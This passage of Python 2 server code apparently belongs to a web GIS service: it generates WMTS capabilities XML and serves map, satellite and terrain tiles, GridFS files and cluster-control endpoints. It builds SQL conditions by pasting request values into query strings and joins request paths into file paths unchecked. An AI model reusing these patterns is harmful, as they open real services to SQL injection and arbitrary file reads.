##scaleDenominator = metersPerUnit/pixelSize * mapUtils.countDistanceFromLatLon(tileMatrixMaxY , tileMatrixMinY) * 1000. /(tileHeight * matrixHeight)
#scaleDenominator = metersPerUnit/pixelSize * mapUtils.countDistanceFromLatLon(tileMatrixMaxY , tileMatrixMinY) /(tileHeight * matrixHeight)
#TileMatrix = etree.SubElement(TileMatrixSet, "TileMatrix" )
##Identifier = etree.SubElement(TileMatrix, ows + "Identifier" ).text = "ynsat_" + str(i)
#Identifier = etree.SubElement(TileMatrix, ows + "Identifier" ).text = str(i)
#ScaleDenominator = etree.SubElement(TileMatrix, "ScaleDenominator" ).text = '%.8f' % scaleDenominator
#TopLeftCorner = etree.SubElement(TileMatrix, "TopLeftCorner" ).text = ['webgis']['wmts']['TopLeftCorner']
#TileWidth = etree.SubElement(TileMatrix, "TileWidth" ).text = str(tileWidth)
#TileHeight = etree.SubElement(TileMatrix, "TileHeight" ).text = str(tileHeight)
#MatrixWidth = etree.SubElement(TileMatrix, "MatrixWidth" ).text = str(matrixWidth)
#MatrixHeight = etree.SubElement(TileMatrix, "MatrixHeight" ).text = str(matrixHeight)
#ret = etree.tostring(root, pretty_print=True, xml_declaration=True, encoding=ENCODING)
#print(ret)
#return ret
#'''
ret = '''<?xml version="1.0" encoding="UTF-8"?>
<Capabilities xmlns="http://www.opengis.net/wmts/1.0"
xmlns:ows="http://www.opengis.net/ows/1.1"
xmlns:xlink="http://www.w3.org/1999/xlink"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:gml="http://www.opengis.net/gml" xsi:schemaLocation="http://www.opengis.net/wmts/1.0 http://schemas.opengis.net/wmts/1.0/wmtsGetCapabilities_response.xsd"
version="1.0.0">
<ows:ServiceIdentification>
<ows:Title>%s</ows:Title>
<ows:ServiceType>OGC WMTS</ows:ServiceType>
<ows:ServiceTypeVersion>1.0.0</ows:ServiceTypeVersion>
</ows:ServiceIdentification>
<ows:OperationsMetadata>
<ows:Operation name="GetCapabilities">
<ows:DCP>
<ows:HTTP>
<ows:Get xlink:href="http://%s:%s/wmts?REQUEST=getcapabilities">
<ows:Constraint name="GetEncoding">
<ows:AllowedValues>
<ows:Value>KVP</ows:Value>
</ows:AllowedValues>
</ows:Constraint>
</ows:Get>
</ows:HTTP>
</ows:DCP>
</ows:Operation>
<ows:Operation name="GetTile">
<ows:DCP>
<ows:HTTP>
<ows:Get xlink:href="http://%s:%s/wmts?REQUEST=gettile">
<ows:Constraint name="GetEncoding">
<ows:AllowedValues>
<ows:Value>KVP</ows:Value>
</ows:AllowedValues>
</ows:Constraint>
</ows:Get>
</ows:HTTP>
</ows:DCP>
</ows:Operation>
</ows:OperationsMetadata>
<Contents>
<Layer>
<ows:Title>%s</ows:Title>
<ows:WGS84BoundingBox>
<ows:LowerCorner>-180.0 -90.0</ows:LowerCorner>
<ows:UpperCorner>180.0 90.0</ows:UpperCorner>
</ows:WGS84BoundingBox>
<ows:Identifier>%s</ows:Identifier>
<Style isDefault="true">
<ows:Identifier>_null</ows:Identifier>
</Style>
<Format>%s</Format>
<TileMatrixSetLink>
<TileMatrixSet>%s</TileMatrixSet>
</TileMatrixSetLink>
</Layer>
<TileMatrixSet>
<ows:Identifier>%s</ows:Identifier>
<ows:SupportedCRS>urn:ogc:def:crs:EPSG::900913</ows:SupportedCRS>
<TileMatrix>
<ows:Identifier>0</ows:Identifier>
<ScaleDenominator>5.590822639508929E8</ScaleDenominator>
<TopLeftCorner>-2.003750834E7 2.0037508E7</TopLeftCorner>
<TileWidth>256</TileWidth>
<TileHeight>256</TileHeight>
<MatrixWidth>1</MatrixWidth>
<MatrixHeight>1</MatrixHeight>
</TileMatrix>
<TileMatrix>
<ows:Identifier>1</ows:Identifier>
<ScaleDenominator>2.7954113197544646E8</ScaleDenominator>
<TopLeftCorner>-2.003750834E7 2.0037508E7</TopLeftCorner>
<TileWidth>256</TileWidth>
<TileHeight>256</TileHeight>
<MatrixWidth>2</MatrixWidth>
<MatrixHeight>2</MatrixHeight>
</TileMatrix>
<TileMatrix>
<ows:Identifier>2</ows:Identifier>
<ScaleDenominator>1.3977056598772323E8</ScaleDenominator>
<TopLeftCorner>-2.003750834E7 2.0037508E7</TopLeftCorner>
<TileWidth>256</TileWidth>
<TileHeight>256</TileHeight>
<MatrixWidth>4</MatrixWidth>
<MatrixHeight>4</MatrixHeight>
</TileMatrix>
<TileMatrix>
<ows:Identifier>3</ows:Identifier>
<ScaleDenominator>6.988528299386162E7</ScaleDenominator>
<TopLeftCorner>-2.003750834E7 2.0037508E7</TopLeftCorner>
<TileWidth>256</TileWidth>
<TileHeight>256</TileHeight>
<MatrixWidth>8</MatrixWidth>
<MatrixHeight>8</MatrixHeight>
</TileMatrix>
<TileMatrix>
<ows:Identifier>4</ows:Identifier>
<ScaleDenominator>3.494264149693081E7</ScaleDenominator>
<TopLeftCorner>-2.003750834E7 2.0037508E7</TopLeftCorner>
<TileWidth>256</TileWidth>
<TileHeight>256</TileHeight>
<MatrixWidth>16</MatrixWidth>
<MatrixHeight>16</MatrixHeight>
</TileMatrix>
<TileMatrix>
<ows:Identifier>5</ows:Identifier>
<ScaleDenominator>1.7471320748465404E7</ScaleDenominator>
<TopLeftCorner>-2.003750834E7 2.0037508E7</TopLeftCorner>
<TileWidth>256</TileWidth>
<TileHeight>256</TileHeight>
<MatrixWidth>32</MatrixWidth>
<MatrixHeight>32</MatrixHeight>
</TileMatrix>
<TileMatrix>
<ows:Identifier>6</ows:Identifier>
<ScaleDenominator>8735660.374232702</ScaleDenominator>
<TopLeftCorner>-2.003750834E7 2.0037508E7</TopLeftCorner>
<TileWidth>256</TileWidth>
<TileHeight>256</TileHeight>
<MatrixWidth>64</MatrixWidth>
<MatrixHeight>64</MatrixHeight>
</TileMatrix>
<TileMatrix>
<ows:Identifier>7</ows:Identifier>
<ScaleDenominator>4367830.187116351</ScaleDenominator>
<TopLeftCorner>-2.003750834E7 2.0037508E7</TopLeftCorner>
<TileWidth>256</TileWidth>
<TileHeight>256</TileHeight>
<MatrixWidth>128</MatrixWidth>
<MatrixHeight>128</MatrixHeight>
</TileMatrix>
<TileMatrix>
<ows:Identifier>8</ows:Identifier>
<ScaleDenominator>2183915.0935581755</ScaleDenominator>
<TopLeftCorner>-2.003750834E7 2.0037508E7</TopLeftCorner>
<TileWidth>256</TileWidth>
<TileHeight>256</TileHeight>
<MatrixWidth>256</MatrixWidth>
<MatrixHeight>256</MatrixHeight>
</TileMatrix>
<TileMatrix>
<ows:Identifier>9</ows:Identifier>
<ScaleDenominator>1091957.5467790877</ScaleDenominator>
<TopLeftCorner>-2.003750834E7 2.0037508E7</TopLeftCorner>
<TileWidth>256</TileWidth>
<TileHeight>256</TileHeight>
<MatrixWidth>512</MatrixWidth>
<MatrixHeight>512</MatrixHeight>
</TileMatrix>
<TileMatrix>
<ows:Identifier>10</ows:Identifier>
<ScaleDenominator>545978.7733895439</ScaleDenominator>
<TopLeftCorner>-2.003750834E7 2.0037508E7</TopLeftCorner>
<TileWidth>256</TileWidth>
<TileHeight>256</TileHeight>
<MatrixWidth>1024</MatrixWidth>
<MatrixHeight>1024</MatrixHeight>
</TileMatrix>
<TileMatrix>
<ows:Identifier>11</ows:Identifier>
<ScaleDenominator>272989.38669477194</ScaleDenominator>
<TopLeftCorner>-2.003750834E7 2.0037508E7</TopLeftCorner>
<TileWidth>256</TileWidth>
<TileHeight>256</TileHeight>
<MatrixWidth>2048</MatrixWidth>
<MatrixHeight>2048</MatrixHeight>
</TileMatrix>
<TileMatrix>
<ows:Identifier>12</ows:Identifier>
<ScaleDenominator>136494.69334738597</ScaleDenominator>
<TopLeftCorner>-2.003750834E7 2.0037508E7</TopLeftCorner>
<TileWidth>256</TileWidth>
<TileHeight>256</TileHeight>
<MatrixWidth>4096</MatrixWidth>
<MatrixHeight>4096</MatrixHeight>
</TileMatrix>
<TileMatrix>
<ows:Identifier>13</ows:Identifier>
<ScaleDenominator>68247.34667369298</ScaleDenominator>
<TopLeftCorner>-2.003750834E7 2.0037508E7</TopLeftCorner>
<TileWidth>256</TileWidth>
<TileHeight>256</TileHeight>
<MatrixWidth>8192</MatrixWidth>
<MatrixHeight>8192</MatrixHeight>
</TileMatrix>
<TileMatrix>
<ows:Identifier>14</ows:Identifier>
<ScaleDenominator>34123.67333684649</ScaleDenominator>
<TopLeftCorner>-2.003750834E7 2.0037508E7</TopLeftCorner>
<TileWidth>256</TileWidth>
<TileHeight>256</TileHeight>
<MatrixWidth>16384</MatrixWidth>
<MatrixHeight>16384</MatrixHeight>
</TileMatrix>
<TileMatrix>
<ows:Identifier>15</ows:Identifier>
<ScaleDenominator>17061.836668423246</ScaleDenominator>
<TopLeftCorner>-2.003750834E7 2.0037508E7</TopLeftCorner>
<TileWidth>256</TileWidth>
<TileHeight>256</TileHeight>
<MatrixWidth>32768</MatrixWidth>
<MatrixHeight>32768</MatrixHeight>
</TileMatrix>
<TileMatrix>
<ows:Identifier>16</ows:Identifier>
<ScaleDenominator>8530.918334211623</ScaleDenominator>
<TopLeftCorner>-2.003750834E7 2.0037508E7</TopLeftCorner>
<TileWidth>256</TileWidth>
<TileHeight>256</TileHeight>
<MatrixWidth>65536</MatrixWidth>
<MatrixHeight>65536</MatrixHeight>
</TileMatrix>
<TileMatrix>
<ows:Identifier>17</ows:Identifier>
<ScaleDenominator>4265.4591671058115</ScaleDenominator>
<TopLeftCorner>-2.003750834E7 2.0037508E7</TopLeftCorner>
<TileWidth>256</TileWidth>
<TileHeight>256</TileHeight>
<MatrixWidth>131072</MatrixWidth>
<MatrixHeight>131072</MatrixHeight>
</TileMatrix>
<TileMatrix>
<ows:Identifier>18</ows:Identifier>
<ScaleDenominator>2132.7295835529058</ScaleDenominator>
<TopLeftCorner>-2.003750834E7 2.0037508E7</TopLeftCorner>
<TileWidth>256</TileWidth>
<TileHeight>256</TileHeight>
<MatrixWidth>262144</MatrixWidth>
<MatrixHeight>262144</MatrixHeight>
</TileMatrix>
<TileMatrix>
<ows:Identifier>19</ows:Identifier>
<ScaleDenominator>1066.3647917764529</ScaleDenominator>
<TopLeftCorner>-2.003750834E7 2.0037508E7</TopLeftCorner>
<TileWidth>256</TileWidth>
<TileHeight>256</TileHeight>
<MatrixWidth>524288</MatrixWidth>
<MatrixHeight>524288</MatrixHeight>
</TileMatrix>
<TileMatrix>
<ows:Identifier>20</ows:Identifier>
<ScaleDenominator>533.1823958882264</ScaleDenominator>
<TopLeftCorner>-2.003750834E7 2.0037508E7</TopLeftCorner>
<TileWidth>256</TileWidth>
<TileHeight>256</TileHeight>
<MatrixWidth>1048576</MatrixWidth>
<MatrixHeight>1048576</MatrixHeight>
</TileMatrix>
<TileMatrix>
<ows:Identifier>21</ows:Identifier>
<ScaleDenominator>266.5911979441132</ScaleDenominator>
<TopLeftCorner>-2.003750834E7 2.0037508E7</TopLeftCorner>
<TileWidth>256</TileWidth>
<TileHeight>256</TileHeight>
<MatrixWidth>2097152</MatrixWidth>
<MatrixHeight>2097152</MatrixHeight>
</TileMatrix>
<TileMatrix>
<ows:Identifier>22</ows:Identifier>
<ScaleDenominator>133.2955989720566</ScaleDenominator>
<TopLeftCorner>-2.003750834E7 2.0037508E7</TopLeftCorner>
<TileWidth>256</TileWidth>
<TileHeight>256</TileHeight>
<MatrixWidth>4194304</MatrixWidth>
<MatrixHeight>4194304</MatrixHeight>
</TileMatrix>
<TileMatrix>
<ows:Identifier>23</ows:Identifier>
<ScaleDenominator>66.6477994860283</ScaleDenominator>
<TopLeftCorner>-2.003750834E7 2.0037508E7</TopLeftCorner>
<TileWidth>256</TileWidth>
<TileHeight>256</TileHeight>
<MatrixWidth>8388608</MatrixWidth>
<MatrixHeight>8388608</MatrixHeight>
</TileMatrix>
<TileMatrix>
<ows:Identifier>24</ows:Identifier>
<ScaleDenominator>33.32389974301415</ScaleDenominator>
<TopLeftCorner>-2.003750834E7 2.0037508E7</TopLeftCorner>
<TileWidth>256</TileWidth>
<TileHeight>256</TileHeight>
<MatrixWidth>16777216</MatrixWidth>
<MatrixHeight>16777216</MatrixHeight>
</TileMatrix>
<TileMatrix>
<ows:Identifier>25</ows:Identifier>
<ScaleDenominator>16.661949871507076</ScaleDenominator>
<TopLeftCorner>-2.003750834E7 2.0037508E7</TopLeftCorner>
<TileWidth>256</TileWidth>
<TileHeight>256</TileHeight>
<MatrixWidth>33554432</MatrixWidth>
<MatrixHeight>33554432</MatrixHeight>
</TileMatrix>
<TileMatrix>
<ows:Identifier>26</ows:Identifier>
<ScaleDenominator>8.330974935753538</ScaleDenominator>
<TopLeftCorner>-2.003750834E7 2.0037508E7</TopLeftCorner>
<TileWidth>256</TileWidth>
<TileHeight>256</TileHeight>
<MatrixWidth>67108864</MatrixWidth>
<MatrixHeight>67108864</MatrixHeight>
</TileMatrix>
<TileMatrix>
<ows:Identifier>27</ows:Identifier>
<ScaleDenominator>4.165487467876769</ScaleDenominator>
<TopLeftCorner>-2.003750834E7 2.0037508E7</TopLeftCorner>
<TileWidth>256</TileWidth>
<TileHeight>256</TileHeight>
<MatrixWidth>134217728</MatrixWidth>
<MatrixHeight>134217728</MatrixHeight>
</TileMatrix>
<TileMatrix>
<ows:Identifier>28</ows:Identifier>
<ScaleDenominator>2.0827437339383845</ScaleDenominator>
<TopLeftCorner>-2.003750834E7 2.0037508E7</TopLeftCorner>
<TileWidth>256</TileWidth>
<TileHeight>256</TileHeight>
<MatrixWidth>268435456</MatrixWidth>
<MatrixHeight>268435456</MatrixHeight>
</TileMatrix>
<TileMatrix>
<ows:Identifier>29</ows:Identifier>
<ScaleDenominator>1.0413718669691923</ScaleDenominator>
<TopLeftCorner>-2.003750834E7 2.0037508E7</TopLeftCorner>
<TileWidth>256</TileWidth>
<TileHeight>256</TileHeight>
<MatrixWidth>536870912</MatrixWidth>
<MatrixHeight>536870912</MatrixHeight>
</TileMatrix>
<TileMatrix>
<ows:Identifier>30</ows:Identifier>
<ScaleDenominator>0.5206859334845961</ScaleDenominator>
<TopLeftCorner>-2.003750834E7 2.0037508E7</TopLeftCorner>
<TileWidth>256</TileWidth>
<TileHeight>256</TileHeight>
<MatrixWidth>1073741824</MatrixWidth>
<MatrixHeight>1073741824</MatrixHeight>
</TileMatrix>
</TileMatrixSet>
</Contents>
</Capabilities>''' % (
str(tiletype),
str(gConfig['webgis']['wmts']['host']),
str(gConfig['webgis']['wmts']['port']),
str(gConfig['webgis']['wmts']['host']),
str(gConfig['webgis']['wmts']['port']),
str(subtype),
str(subtype),
str(gConfig['mime_type'][gConfig['webgis'][tiletype][subtype]['mimetype']]),
str(subtype),
str(subtype),
)
#<ServiceMetadataURL xlink:href="http://%s:%s/wmts?REQUEST=getcapabilities"/>
return ret
def download_callback(*args, **kwargs):
global gConfig, gMapTileCache, gSatTileCache, gTerrainCache
global STATICRESOURCE_IMG_DIR
zoom, col, row = args[1][2], args[1][0], args[1][1]
root = os.path.abspath(gConfig['wmts']['tiles_map_root'])
if args[2] == mapConst.LAYER_SAT:
root = os.path.abspath(gConfig['wmts']['tiles_sat_root'])
if args[2] == mapConst.LAYER_MAP:
root = os.path.abspath(gConfig['wmts']['tiles_map_root'])
p = os.path.join(root,
str(zoom),
str(col / 1024),
str(col % 1024),
str(row / 1024),
str(row % 1024) + gConfig['wmts']['format']
)
if os.path.exists(p):
key = '%d-%d-%d' % (zoom, col, row)
with open(p, 'rb') as f:
f1 = gevent.fileobject.FileObjectThread(f, 'rb')
if args[2] == mapConst.LAYER_SAT:
gSatTileCache[key] = f1.read()
if args[2] == mapConst.LAYER_MAP:
gMapTileCache[key] = f1.read()
def handle_wmts_GetTile(params):
global gConfig
mimetype, ret = None, None
tiletype = 'webgis/tiles'
arr = tiletype.split('/')
subtype = None
if params.has_key('TILEMATRIXSET'):
subtype = params['TILEMATRIXSET']
level, y, x = None, None, None
if params.has_key('TILEMATRIX'):
level = int(params['TILEMATRIX'])
if params.has_key('TILEROW'):
y = int(params['TILEROW'])
if params.has_key('TILECOL'):
x = int(params['TILECOL'])
if subtype is not None and level is not None and y is not None and x is not None:
tilepath = '%d/%d/%d%s' % (level, x, y, str(gConfig['webgis'][arr[1]][subtype]))
d = {}
d['x'] = str(x)
d['y'] = str(y)
d['level'] = str(level)
mimetype, ret = db_util.gridfs_tile_find(tiletype, subtype, tilepath, d)
return mimetype, ret
def handle_tiles(environ):
global gConfig, gTileCache
global STATICRESOURCE_IMG_DIR
def get_blank_tile(image_type):
blank_tile = ''
picpath = os.path.join(STATICRESOURCE_IMG_DIR, gConfig['webgis']['tiles'][image_type]['missing'])
with open(picpath, 'rb') as f:
f1 = gevent.fileobject.FileObjectThread(f, 'rb')
blank_tile = f1.read()
return blank_tile
headers = {}
#path_info = environ['PATH_INFO']
#d = cgi.parse(None, environ)
querydict, buf = get_querydict_by_GET_POST(environ)
ret = None
mimetype = 'image/png'
image_type = None
#key = path_info.replace('/tiles/','')
if querydict.has_key('image_type') and querydict.has_key('x') and querydict.has_key('y') and querydict.has_key('level'):
image_type = querydict['image_type']
x, y, level = querydict['x'], querydict['y'], querydict['level']
tilepath = '%s/%s/%s%s' % (level, x, y, gConfig['webgis']['tiles'][image_type]['mimetype'])
if not gTileCache.has_key(image_type):
gTileCache[image_type] = {}
if not gTileCache[image_type].has_key('missing'):
gTileCache[image_type]['missing'] = get_blank_tile(image_type)
if gTileCache[image_type].has_key(tilepath):
ret = gTileCache[image_type][tilepath]
else:
try:
mimetype, ret = db_util.gridfs_tile_find('webgis/tiles', image_type, tilepath, querydict)
gTileCache[image_type][tilepath] = ret
except:
print(sys.exc_info())
ret = gTileCache[image_type]['missing']
else:
if image_type:
if not gTileCache.has_key(image_type):
gTileCache[image_type] = {}
if not gTileCache[image_type].has_key('missing'):
gTileCache[image_type]['missing'] = get_blank_tile(image_type)
ret = gTileCache[image_type]['missing']
else:
ret = get_blank_tile('arcgis_sat')
if ret is None:
ret = gTileCache[image_type]['missing']
headers['Content-Type'] = mimetype
return '200 OK', headers, ret
def handle_terrain(environ):
global gConfig, gTileCache
path_info = environ['PATH_INFO']
#d = cgi.parse(None, environ)
querydict, buf = get_querydict_by_GET_POST(environ)
ret = None
headers = {}
mimetype = str('application/octet-stream')
key = path_info.replace('/terrain/','')
terrain_type = 'quantized_mesh'
if querydict.has_key('terrain_type'):
terrain_type = querydict['terrain_type']
if not gTileCache.has_key(terrain_type):
gTileCache[terrain_type] = {}
if gTileCache[terrain_type].has_key(key):
ret = gTileCache[terrain_type][key]
else:
tilepath = key
if tilepath == 'layer.json':
mimetype, ret = db_util.gridfs_tile_find('webgis/terrain', terrain_type, tilepath, querydict)
gTileCache[terrain_type][key] = ret
headers['Content-Type'] = mimetype
return '200 OK', headers, ret
else:
print('tilepath:%s' % tilepath)
mimetype, ret = db_util.gridfs_tile_find('webgis/terrain', terrain_type, tilepath, querydict)
if ret:
gTileCache[terrain_type][key] = ret
headers['Content-Type'] = mimetype
return '200 OK', headers, ret
else:
if not gTileCache[terrain_type].has_key('missing'):
print('reading mongo blank_terrain...')
tilepath = gConfig['webgis']['terrain'][terrain_type]['missing'] #'0/0/0.terrain'
mimetype, ret = db_util.gridfs_tile_find('webgis/terrain', terrain_type, tilepath, querydict)
gTileCache[terrain_type]['missing'] = ret
ret = gTileCache[terrain_type]['missing']
headers['Content-Type'] = mimetype
return '200 OK', headers, ret
def handle_terrain1(environ):
global gConfig, gMapTileCache, gSatTileCache, gTerrainCache
path_info = environ['PATH_INFO']
#d = cgi.parse(None, environ)
ret = None
headers = {}
key = path_info.replace('/terrain/','')
if gTerrainCache.has_key(key):
ret = gTerrainCache[key]
else:
arr = key.split('/')
tilepath = gConfig['webgis']['terrain']['tiles_dir']
for i in arr:
tilepath = os.path.join(tilepath, i)
tilepath = os.path.abspath(tilepath)
ret = ''
if os.path.exists(tilepath):
#print('reading %s...' % tilepath)
with open(tilepath, 'rb') as f:
f1 = gevent.fileobject.FileObjectThread(f, 'rb')
ret = f1.read()
gTerrainCache[key] = ret
else:
if gTerrainCache.has_key('missing'):
ret = gTerrainCache['missing']
else:
print('reading blank_terrain...')
with open(gConfig['webgis']['terrain']['blank_terrain'], 'rb') as f:
f1 = gevent.fileobject.FileObjectThread(f, 'rb')
ret = f1.read()
gTerrainCache['missing'] = ret
headers['Content-Type'] = 'application/octet-stream'
return '200 OK', headers, ret
def handle_arcgistile(environ):
global gConfig, gMapTileCache, gSatTileCache
global STATICRESOURCE_IMG_DIR
ret = None
headers = {}
dd = cgi.parse(None, environ)
d = {}
for k in dd.keys():
d[k] = dd[k][0]
if d.has_key('zoom') and d.has_key('col') and d.has_key('row'):
zoom = int(d['zoom'])
col = int(d['col'])
row = int(d['row'])
key = '%d-%d-%d' % (zoom, col, row)
if not gSatTileCache.has_key(key):
try:
#picpath = os.path.join(gConfig['wmts']['arcgis_tiles_root'], '_alllayers', 'L%02d' % zoom, 'R%08x' % row, 'C%08x%s' % (col, gConfig['wmts']['format']))
picpath = os.path.join(gConfig['webgis']['wmts']['arcgis_tiles_root'], '%d' % zoom, '%d' % col, '%d%s' % (row, gConfig['webgis']['wmts']['format']))
print('%s, %s' % (key, picpath))
with open(picpath, 'rb') as f:
f1 = gevent.fileobject.FileObjectThread(f, 'rb')
gSatTileCache[key] = f1.read()
except:
foundit = False
if not foundit:
key = 'missing'
if not gSatTileCache.has_key(key):
picpath = os.path.join(STATICRESOURCE_IMG_DIR, gConfig['webgis']['wmts']['missing'])
with open(picpath, 'rb') as f:
f1 = gevent.fileobject.FileObjectThread(f, 'rb')
gSatTileCache[key] = f1.read()
ret = gSatTileCache[key]
elif d.has_key('is_esri') :
key = environ['PATH_INFO'].replace('/arcgistile/','')
if not gSatTileCache.has_key(key):
try:
#picpath = os.path.join(gConfig['webgis']['wmts']['arcgis_tiles_root'], '_alllayers', 'L%02d' % zoom, 'R%08x' % row, 'C%08x%s' % (col, gConfig['webgis']['wmts']['format']))
picpath = os.path.join(gConfig['webgis']['wmts']['arcgis_tiles_root'], key)
print('%s, %s' % (key, picpath))
with open(picpath, 'rb') as f:
f1 = gevent.fileobject.FileObjectThread(f, 'rb')
gSatTileCache[key] = f1.read()
except:
foundit = False
if not foundit:
key = 'missing'
if not gSatTileCache.has_key(key):
picpath = os.path.join(STATICRESOURCE_IMG_DIR, gConfig['webgis']['wmts']['missing'])
with open(picpath, 'rb') as f:
f1 = gevent.fileobject.FileObjectThread(f, 'rb')
gSatTileCache[key] = f1.read()
ret = gSatTileCache[key]
else:
if not gSatTileCache.has_key('missing'):
picpath = os.path.join(STATICRESOURCE_IMG_DIR, gConfig['webgis']['wmts']['missing'])
with open(picpath, 'rb') as f:
f1 = gevent.fileobject.FileObjectThread(f, 'rb')
gSatTileCache['missing'] = f1.read()
ret = gSatTileCache['missing']
headers['Content-Type'] = str(gConfig['mime_type'][gConfig['webgis']['wmts']['format']])
return '200 OK', headers, ret
def handle_wmts(environ):
dd = cgi.parse(None, environ)
d = {}
headers = {}
mimetype, ret = None, None
for k in dd.keys():
d[k.upper()] = dd[k][0]
ret, mimetype = None, None
if d.has_key('REQUEST') :
d['REQUEST'] = d['REQUEST'].replace('/1.0.0/WMTSCapabilities.xml', '')
if d.has_key('TILETYPE'):
d['TILETYPE'] = d['TILETYPE'].replace('/1.0.0/WMTSCapabilities.xml', '')
if d.has_key('SUBTYPE'):
d['SUBTYPE'] = d['SUBTYPE'].replace('/1.0.0/WMTSCapabilities.xml', '')
if d['REQUEST'].lower() in ['getcapabilities']:
mimetype, ret = handle_wmts_GetCapabilities(d)
elif d['REQUEST'].lower() in ['gettile']:
mimetype, ret = handle_wmts_GetTile(d)
headers['Content-Type'] = mimetype
return '200 OK', headers, ret
def handle_cluster(environ):
global gConfig
headers = {}
headers['Content-Type'] = 'text/json;charset=' + ENCODING
if int(environ['SERVER_PORT'])==int(gConfig['cluster']['manager_port']) and gConfig['cluster']['enable_cluster'] in ['true','True']:
op = ''
if environ['PATH_INFO']=='/create_cluster':
if len(get_pid_from_name('nginx'))==0:
op = 'create ok'
create_cluster()
elif environ['PATH_INFO']=='/kill_cluster':
op = 'kill ok'
kill_cluster()
#print(environ)
return '200 OK', headers, json.dumps({'result':op})
else:
return '200 OK', headers, json.dumps({'result':'cluster is disabled or not by manager'})
def handle_test(environ):
s = '测试OK'
headers = {}
d = cgi.parse(None, environ)
#print(d)
headers['Content-Type'] = 'text/json;charset=' + ENCODING
#print(s)
return '200 OK', headers, s
def get_condition_from_dict(dct):
cond = '1=1'
for k in dct.keys():
if k in ['voltage', 'line_id', 'id', 'tower_id', 'start_tower_id', 'end_tower_id', 'model_code', 'side', 'position']:
if k == 'side':
if dct[k]=='1':
cond += " AND %s='%s'" % (k, u'正')
elif dct[k]=='0':
cond += " AND %s='%s'" % (k, u'反')
else:
cond += " AND %s='%s'" % (k, dct[k])
else:
cond += " AND %s=%s" % (k, dct[k])
#print(cond)
return cond
def mongo_get_condition_from_dict(dct):
ret = {}
for k in dct.keys():
ret[k] = dct[k][0]
print(ret)
return ret
def handle_get_method(environ):
global ENCODING
global STATICRESOURCE_DIR, UPLOAD_PHOTOS_DIR, UPLOAD_VOICE_DIR
global gConfig
ret = {}
s = ''
querydict, buf = get_querydict_by_GET_POST(environ)
isgrid = False
area = ''
data = {}
headers = {}
clienttype = 'default'
if querydict.has_key('clienttype'):
clienttype = querydict['clienttype']
if querydict.has_key('grid'):
isgrid = True
if querydict.has_key('area'):
area = querydict['area']
# if querydict.has_key('geojson'):
# if querydict['geojson']=='line_towers':
# data = db_util.gen_geojson_by_lines(area)
# s = json.dumps(data, ensure_ascii=True, indent=4)
# elif querydict['geojson']=='tracks':
# data = db_util.gen_geojson_tracks(area)
# s = json.dumps(data, ensure_ascii=True, indent=4)
# else:
# k = querydict['geojson']
# p = os.path.abspath(STATICRESOURCE_DIR)
# if k == 'potential_risk':
# k = 'geojson_%s_%s' % (k, area)
# p = os.path.join(p, 'geojson', area, '%s.json' % k)
# #print(p)
# if os.path.exists(p):
# with open(p) as f:
# f1 = gevent.fileobject.FileObjectThread(f, 'r')
# s = f1.read()
# else:
# p = os.path.abspath(STATICRESOURCE_DIR)
# p = os.path.join(p, 'geojson', '%s.json' % k)
# if os.path.exists(p):
# with open(p) as f:
# f1 = gevent.fileobject.FileObjectThread(f, 'r')
# s = f1.read()
#
#
#
# if querydict.has_key('table'):
# table = querydict['table']
# dbtype = 'odbc'
# if querydict.has_key('dbtype'):
# dbtype = querydict['dbtype']
#
# if dbtype == 'pg':
# data = db_util.pg_get_records(table, get_condition_from_dict(querydict))
# else:
# data = db_util.odbc_get_records(table, get_condition_from_dict(querydict), area)
# if table in ['TABLE_TOWER']:
# if querydict.has_key('line_id'):
# data = db_util.odbc_get_sorted_tower_by_line(querydict['line_id'], area)
#
# if isgrid:
# data = {'Rows':data}
# s = json.dumps(data, ensure_ascii=True, indent=4)
# if querydict.has_key('check_file'):
# fn = querydict['check_file']
# dir_name = querydict['dir_name']
# ret["result"] = {}
# ret["result"]["filename"] = fn
# if dir_name == 'voice':
# if check_voice_file_by_fault(fn):
# ret["result"]["exist"] = "true"
# else:
# ret["result"]["exist"] = "false"
# else:
# if os.path.exists(os.path.join(UPLOAD_PHOTOS_DIR, dir_name, fn)):
# ret["result"]["exist"] = "true"
# else:
# ret["result"]["exist"] = "false"
# s = json.dumps(ret, ensure_ascii=True, indent=4)
# if querydict.has_key('delete_file'):
# fn = querydict['delete_file']
# dir_name = querydict['dir_name']
# ret["result"] = {}
# ret["result"]["filename"] = fn
# if dir_name == 'voice':
# pl = get_voice_file_by(fn)
# if len(pl)>0:
# for i in pl:
# p = os.path.join(UPLOAD_VOICE_DIR, fn)
# if os.path.exists(p):
# os.remove(p)
# ret["result"]["removed"] = "true"
# else:
# ret["result"]["removed"] = "false"
#
# else:
# p = os.path.join(UPLOAD_PHOTOS_DIR, dir_name, fn)
# if os.path.exists(p):
# os.remove(p)
# ret["result"]["removed"] = "true"
# else:
# ret["result"]["removed"] = "false"
# s = json.dumps(ret, ensure_ascii=True, indent=4)
# if querydict.has_key('list_file_dir_name'):
# dir_name = querydict['list_file_dir_name']
# ret["result"] = {}
# ret["result"]["dirs"] = [dir_name, ]
# p = os.path.join(UPLOAD_PHOTOS_DIR, dir_name)
# if os.path.exists(p):
# l = os.listdir(p)
# ret["result"]["files"] = l
# else:
# ret["result"]["files"] = []
# s = json.dumps(ret, ensure_ascii=True, indent=4)
# if querydict.has_key('get_voice_files'):
# get_voice_files = querydict['get_voice_files']
# ret["result"] = {}
# ret["result"]["ids"] = get_voice_file_all()
# s = json.dumps(ret, ensure_ascii=True, indent=4)
if querydict.has_key('op'):
op = querydict['op']
if op == "gridfs":
ret = db_util.gridfs_find(querydict, str(gConfig['wsgi']['application']))
if isinstance(ret, tuple) and ret[0] and ret[1]:
headers['Content-Type'] = str(ret[0])
if querydict.has_key('attachmentdownload'):
headers['Content-Disposition'] = 'attachment;filename="' + enc(ret[2]) + '"'
s = ret[1]
return '200 OK', headers , s
if isinstance(ret, list):
s = json.dumps(ret, ensure_ascii=True, indent=4)
elif op == "gridfs_delete":
try:
db_util.gridfs_delete(querydict, str(gConfig['wsgi']['application']))
ret = ''
except:
ret["result"] = sys.exc_info()[1].message
s = json.dumps(ret, ensure_ascii=True, indent=4)
headers['Content-Type'] = 'text/json;charset=' + ENCODING
if isinstance(ret, dict) and len(ret.keys())==0:
ret["result"] = "ok"
if isinstance(s, list) and len(s)==0:
s = json.dumps(ret, ensure_ascii=True, indent=4)
return '200 OK', headers, s
def create_upload_xls_dir():
global STATICRESOURCE_DIR
p = os.path.join(STATICRESOURCE_DIR, 'upload')
if not os.path.exists(p):
os.mkdir(p)
